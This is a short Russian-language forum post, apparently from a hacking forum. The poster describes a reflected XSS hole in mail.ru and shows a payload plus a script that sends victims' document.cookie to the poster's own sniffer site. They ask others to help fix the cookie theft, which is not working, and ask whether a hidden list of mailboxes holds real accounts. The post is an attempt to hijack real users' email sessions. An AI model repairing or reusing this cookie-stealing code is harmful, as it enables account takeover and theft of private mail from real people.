1. У меня есть уязвимость xss mail.ru, ?inf=">alert('OK')
2. В index.html вот ...?inf=">
3. В xss.js вот img = new Image(); img.src = "http://мой сайт/jpg/s.jpg?"+document.cookie;
Сниффер свой.

Проблема вот с чем, посылаю письмо, переходит на уязвимую страницу и все, cookies нет.
Проблема думаю в 3., только незнаю как исправить.
Кто может, помогите.

Еще вот:

Скрытый текст (вы должны быть авторизованы и иметь 15 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Это настоящие почтовые ящики ... или нет?